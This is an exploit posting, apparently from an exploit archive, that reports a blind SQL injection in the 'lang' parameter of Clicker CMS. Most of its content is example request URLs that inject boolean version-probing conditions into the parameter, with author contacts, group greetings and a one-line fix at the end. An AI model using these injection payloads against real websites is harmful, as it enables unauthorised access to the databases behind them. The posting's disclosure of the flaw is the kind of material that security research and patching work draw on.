# Exploit Title: Clicker CMS Blind SQL Injection Vulnerability# Date: 2010-06-25# Author: hacker@sr.gov.yu# Software Link: n/a# Version: n/a####################################################################.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN).:. Home : www.evilzone.org, www.balcan-security.com
.:. Script : Clicker CMS
.:. Bug Type : Blind Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################===[ Exploit ]===.:. It was found that Clicker CMS does not validate properly the "lang"
parameter value.
http://server/index.php?lang=4[BSQLi]===[ Example ]===
http://server/index.php?lang=4and substring(@@version,1,1)=5--(true or false)
http://server/index.php?lang=4and substring(@@version,1,1)=4--(false or true)===[ Solution ]===.:. Input validation of "lang" parameter should be corrected.
Greetz to ALL EVILZONE.org && BALCAN-SECURITY.com members!!!
Pozdrav za sve iz Srbije!!! :-)))
